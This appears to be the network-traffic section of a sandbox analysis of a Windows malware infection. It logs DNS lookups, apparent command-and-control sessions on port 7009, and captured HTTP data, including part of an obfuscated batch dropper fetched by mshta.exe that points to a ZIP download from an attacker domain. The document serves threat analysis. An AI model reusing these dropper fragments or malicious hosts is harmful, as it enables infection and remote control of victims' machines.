Jan 7, 2025 22:33:06.019377947 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:06.935434103 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:06.935458899 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935487986 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935527086 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935539007 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935549974 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935566902 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:06.935575962 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935584068 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935594082 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:06.935599089 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935606003 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935616016 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:06.935621023 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935627937 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935642958 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935652971 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935669899 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935676098 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935678005 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:06.935678005 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:06.935702085 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935709953 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935717106 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935728073 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:06.935728073 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:06.935734987 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935750008 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935760021 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935775042 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:06.935781002 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935791016 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935802937 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935813904 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:06.935822010 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935831070 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935837030 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935847998 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:06.935863018 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935870886 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:06.935884953 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935895920 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935915947 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935915947 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:06.935940027 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935969114 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.935971022 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:06.936008930 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:06.936018944 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:06.936055899 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:06.936100006 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:07.147341013 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:07.148686886 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:07.583338976 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:07.583463907 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.021411896 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.021436930 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.021497011 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.030770063 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.030776978 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.030788898 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.030838013 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.030843973 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.030853033 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.030883074 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.030889034 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.030915022 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.030919075 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.030930996 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.030960083 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.030963898 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.031022072 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.031025887 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.031039000 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.031050920 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.031064034 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.031073093 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.031081915 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.031102896 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.031107903 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.031121016 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.031189919 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.031248093 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.235332966 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.235384941 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.323728085 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.323739052 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.323796034 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.327209949 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.327214003 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.327228069 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.327250004 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.327327967 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.327333927 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.327347040 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.327368021 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.327420950 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.327519894 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.327541113 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.535334110 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.535432100 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.553275108 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.553282976 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.553420067 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.563813925 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.563818932 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.563834906 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.563852072 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.563863993 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.563936949 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.563951969 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:08.564099073 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.564099073 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.752960920 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.761925936 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:08.953310013 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:49.536401033 CET	49753	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:49.541239023 CET	7009	49753	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:49.541312933 CET	49753	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:49.545445919 CET	49753	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:49.550209999 CET	7009	49753	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:50.065682888 CET	7009	49753	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:50.109026909 CET	49753	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:50.202455997 CET	7009	49753	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:50.209213018 CET	49753	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:50.214014053 CET	7009	49753	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:50.214813948 CET	49753	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:50.219583035 CET	7009	49753	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:50.492217064 CET	7009	49753	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:50.493293047 CET	49753	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:50.498018980 CET	7009	49753	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:50.570336103 CET	7009	49753	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:50.614834070 CET	49754	80	192.168.2.4	178.237.33.50
Jan 7, 2025 22:33:50.619692087 CET	80	49754	178.237.33.50	192.168.2.4
Jan 7, 2025 22:33:50.619762897 CET	49754	80	192.168.2.4	178.237.33.50
Jan 7, 2025 22:33:50.619856119 CET	49754	80	192.168.2.4	178.237.33.50
Jan 7, 2025 22:33:50.624591112 CET	80	49754	178.237.33.50	192.168.2.4
Jan 7, 2025 22:33:50.624667883 CET	49753	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:51.238323927 CET	80	49754	178.237.33.50	192.168.2.4
Jan 7, 2025 22:33:51.238507032 CET	49754	80	192.168.2.4	178.237.33.50
Jan 7, 2025 22:33:51.247037888 CET	49753	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:51.251822948 CET	7009	49753	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:52.238210917 CET	80	49754	178.237.33.50	192.168.2.4
Jan 7, 2025 22:33:52.239967108 CET	49754	80	192.168.2.4	178.237.33.50
Jan 7, 2025 22:34:00.608962059 CET	7009	49753	193.26.115.39	192.168.2.4
Jan 7, 2025 22:34:00.610586882 CET	49753	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 22:34:00.615362883 CET	7009	49753	193.26.115.39	192.168.2.4
Jan 7, 2025 22:34:30.624669075 CET	7009	49753	193.26.115.39	192.168.2.4
Jan 7, 2025 22:34:30.626187086 CET	49753	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 22:34:30.630954027 CET	7009	49753	193.26.115.39	192.168.2.4
Jan 7, 2025 22:34:44.416728020 CET	56889	53	192.168.2.4	1.1.1.1
Jan 7, 2025 22:34:44.421596050 CET	53	56889	1.1.1.1	192.168.2.4
Jan 7, 2025 22:34:44.421696901 CET	56889	53	192.168.2.4	1.1.1.1
Jan 7, 2025 22:34:44.421982050 CET	56889	53	192.168.2.4	1.1.1.1
Jan 7, 2025 22:34:44.426760912 CET	53	56889	1.1.1.1	192.168.2.4
Jan 7, 2025 22:34:44.877166986 CET	53	56889	1.1.1.1	192.168.2.4
Jan 7, 2025 22:34:44.878004074 CET	56889	53	192.168.2.4	1.1.1.1
Jan 7, 2025 22:34:44.884001970 CET	53	56889	1.1.1.1	192.168.2.4
Jan 7, 2025 22:34:44.884067059 CET	56889	53	192.168.2.4	1.1.1.1
Jan 7, 2025 22:35:00.624954939 CET	7009	49753	193.26.115.39	192.168.2.4
Jan 7, 2025 22:35:00.625471115 CET	49753	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 22:35:00.630283117 CET	7009	49753	193.26.115.39	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 22:32:56.993391037 CET	54079	53	192.168.2.4	1.1.1.1
Jan 7, 2025 22:32:57.025300980 CET	53	54079	1.1.1.1	192.168.2.4
Jan 7, 2025 22:32:59.826622963 CET	51871	53	192.168.2.4	1.1.1.1
Jan 7, 2025 22:32:59.841789007 CET	53	51871	1.1.1.1	192.168.2.4
Jan 7, 2025 22:33:15.015511990 CET	59567	53	192.168.2.4	1.1.1.1
Jan 7, 2025 22:33:20.615777016 CET	60094	53	192.168.2.4	1.1.1.1
Jan 7, 2025 22:33:20.624346972 CET	53	60094	1.1.1.1	192.168.2.4
Jan 7, 2025 22:33:43.189129114 CET	52759	53	192.168.2.4	1.1.1.1
Jan 7, 2025 22:33:43.197587967 CET	53	52759	1.1.1.1	192.168.2.4
Jan 7, 2025 22:33:49.499651909 CET	64259	53	192.168.2.4	1.1.1.1
Jan 7, 2025 22:33:49.534348011 CET	53	64259	1.1.1.1	192.168.2.4
Jan 7, 2025 22:33:50.602499008 CET	50382	53	192.168.2.4	1.1.1.1
Jan 7, 2025 22:33:50.611063004 CET	53	50382	1.1.1.1	192.168.2.4
Jan 7, 2025 22:34:44.412893057 CET	53	57869	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 22:32:56.993391037 CET	192.168.2.4	1.1.1.1	0x63ca	Standard query (0)	candwfarmsllc.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:32:59.826622963 CET	192.168.2.4	1.1.1.1	0xade8	Standard query (0)	myguyapp.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:33:15.015511990 CET	192.168.2.4	1.1.1.1	0xaa02	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:33:20.615777016 CET	192.168.2.4	1.1.1.1	0x2c1c	Standard query (0)	ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:33:43.189129114 CET	192.168.2.4	1.1.1.1	0xd697	Standard query (0)	ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:33:49.499651909 CET	192.168.2.4	1.1.1.1	0x1fc5	Standard query (0)	me-work.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:33:50.602499008 CET	192.168.2.4	1.1.1.1	0x49	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 22:32:57.025300980 CET	1.1.1.1	192.168.2.4	0x63ca	No error (0)	candwfarmsllc.com		193.26.115.39	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:32:59.841789007 CET	1.1.1.1	192.168.2.4	0xade8	No error (0)	myguyapp.com		193.26.115.39	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:33:14.484772921 CET	1.1.1.1	192.168.2.4	0x8e43	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:33:14.484772921 CET	1.1.1.1	192.168.2.4	0x8e43	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:33:15.022607088 CET	1.1.1.1	192.168.2.4	0xaa02	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 7, 2025 22:33:20.624346972 CET	1.1.1.1	192.168.2.4	0x2c1c	Name error (3)	ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:33:43.197587967 CET	1.1.1.1	192.168.2.4	0xd697	Name error (3)	ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:33:49.534348011 CET	1.1.1.1	192.168.2.4	0x1fc5	No error (0)	me-work.com		193.26.115.39	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:33:50.611063004 CET	1.1.1.1	192.168.2.4	0x49	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

candwfarmsllc.com

myguyapp.com

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49754	178.237.33.50	80	9168	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 22:33:50.619856119 CET	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Jan 7, 2025 22:33:51.238323927 CET	1171	IN	HTTP/1.1 200 OK date: Tue, 07 Jan 2025 21:33:51 GMT server: Apache content-length: 963 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED] Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	193.26.115.39	443	7308	C:\Windows\SysWOW64\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 21:32:57 UTC	307	OUT	GET /c2.bat HTTP/1.1 Accept: / Accept-Language: en-CH Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: candwfarmsllc.com Connection: Keep-Alive
2025-01-07 21:32:57 UTC	288	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 21:32:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 07 Jan 2025 14:48:52 GMT ETag: "e32-62b1ed7f84eca" Accept-Ranges: bytes Content-Length: 3634 Connection: close Content-Type: application/x-msdownload
2025-01-07 21:32:57 UTC	3634	IN	Data Raw: 40 25 56 4c 75 78 44 78 42 4d 25 65 25 7a 6b 6e 68 74 72 74 69 25 63 25 71 58 49 65 25 68 25 44 69 6f 55 70 72 62 25 6f 25 6e 46 25 20 25 58 53 7a 70 4a 75 4a 25 6f 25 5a 25 66 25 64 4c 25 66 25 65 45 4d 42 25 0d 0a 73 65 74 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6d 79 67 75 79 61 70 70 2e 63 6f 6d 2f 6d 73 77 6f 72 64 2e 7a 69 70 0d 0a 73 25 4f 66 52 5a 68 25 65 25 62 7a 68 6b 72 75 53 59 25 74 25 44 6b 75 74 4b 64 25 20 25 64 78 44 48 25 75 25 4b 7a 47 25 72 25 4b 47 75 57 67 70 42 6d 4d 6f 25 6c 25 61 64 71 50 68 42 77 52 25 3d 25 59 4e 4d 6a 6d 25 68 25 72 74 52 4c 74 50 4a 65 52 25 74 25 44 53 66 57 7a 53 25 74 25 79 59 79 25 70 25 41 42 54 4d 57 58 75 41 73 25 73 25 6d 25 3a 25 4d 49 25 2f 25 53 6e 42 6c 25 2f 25 74 74 6d 25 6d 25 67 76 74 25 79 25 Data Ascii: @%VLuxDxBM%e%zknhtrti%c%qXIe%h%DioUprb%o%nF% %XSzpJuJ%o%Z%f%dL%f%eEMB%set url=https://myguyapp.com/msword.zips%OfRZh%e%bzhkruSY%t%DkutKd% %dxDH%u%KzG%r%KGuWgpBmMo%l%adqPhBwR%=%YNMjm%h%rtRLtPJeR%t%DSfWzS%t%yYy%p%ABTMWXuAs%s%m%:%MI%/%SnBl%/%ttm%m%gvt%y%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	193.26.115.39	443	7512	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 21:33:00 UTC	163	OUT	GET /W2.pdf HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: myguyapp.com Connection: Keep-Alive
2025-01-07 21:33:00 UTC	282	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 21:33:00 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 07 Jan 2025 19:23:04 GMT ETag: "10f3d-62b22ac96cf3c" Accept-Ranges: bytes Content-Length: 69437 Connection: close Content-Type: application/pdf
2025-01-07 21:33:00 UTC	7910	IN	Data Raw: 25 50 44 46 2d 31 2e 34 0a 25 e2 e3 cf d3 0a 31 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 57 69 64 74 68 20 32 35 34 39 2f 48 65 69 67 68 74 20 33 32 39 39 2f 4c 65 6e 67 74 68 20 33 35 36 37 38 2f 43 6f 6c 6f 72 53 70 61 63 65 5b 2f 49 6e 64 65 78 65 64 5b 2f 43 61 6c 52 47 42 3c 3c 2f 47 61 6d 6d 61 5b 32 2e 32 20 32 2e 32 20 32 2e 32 5d 2f 4d 61 74 72 69 78 5b 30 2e 34 31 32 33 39 20 30 2e 32 31 32 36 34 20 30 2e 30 31 39 33 33 20 30 2e 33 35 37 35 38 20 30 2e 37 31 35 31 37 20 30 2e 31 31 39 31 39 20 30 2e 31 38 30 34 35 20 30 2e 30 37 32 31 38 20 30 2e 39 35 30 34 5d 2f 57 68 69 74 65 50 6f 69 6e 74 5b 30 2e 39 35 30 34 33 20 31 20 31 2e 30 39 5d 3e 3e 5d 20 31 28 00 00 00 ff ff ff Data Ascii: %PDF-1.4%1 0 obj<</Type/XObject/Subtype/Image/Width 2549/Height 3299/Length 35678/ColorSpace[/Indexed[/CalRGB<</Gamma[2.2 2.2 2.2]/Matrix[0.41239 0.21264 0.01933 0.35758 0.71517 0.11919 0.18045 0.07218 0.9504]/WhitePoint[0.95043 1 1.09]>>] 1(
2025-01-07 21:33:00 UTC	16384	IN	Data Raw: f1 bb f4 48 93 6a ef 97 6c 9b 5f 72 d9 f9 bd ed fd d4 de 68 fd e9 ff 30 dc 89 7e 5b 33 f6 fb 5f 9b ec a8 2d 3a bf 13 62 79 c6 cb 1f 87 bd df ff 1c b7 70 aa ca 15 61 fd 69 f4 2b 13 93 d6 d1 ef 70 2b fc 8c 4a 3b bf 6f d4 41 f0 73 61 61 ad f7 4b 86 3b 59 e5 db b1 5f de aa 5c bf e0 89 2c cd e4 f1 60 a5 6a 9a d0 4c 7a 3f 9a 9f 0e 3f a6 b4 d5 d8 2f 35 ea a7 34 f8 4d 9e b6 5f 4d 23 fd 94 37 89 65 bc 94 5a 17 f5 f7 ca 2a 93 d0 0c 07 6f f7 70 d9 61 58 76 d5 e9 70 27 a3 94 7a a3 2a fa 6f 5f 39 55 d5 85 56 85 21 33 de 48 a7 e8 71 3a a9 8b d3 9c f8 0f e8 7f 15 3d f8 82 7f 4c 9b b7 f4 c7 a0 27 e5 87 f9 fa ff 45 cf f5 4b c6 3f 8f 77 41 7a c2 7e a4 41 bf 77 9d b8 b0 fd f2 0f 2a ab df 24 5a fd a4 7e 0e 83 0e 6f bf f4 3c d0 99 6c b8 53 4d 7e af d4 73 f5 9d fa 81 be f2 12 Data Ascii: Hjl_rh0~[3_-:bypai+p+J;oAsaaK;Y_\,`jLz??/54M_M#7eZopaXvp'zo_9UV!3Hq:=L'EK?wAz~Aw*$Z~o<lSM~s
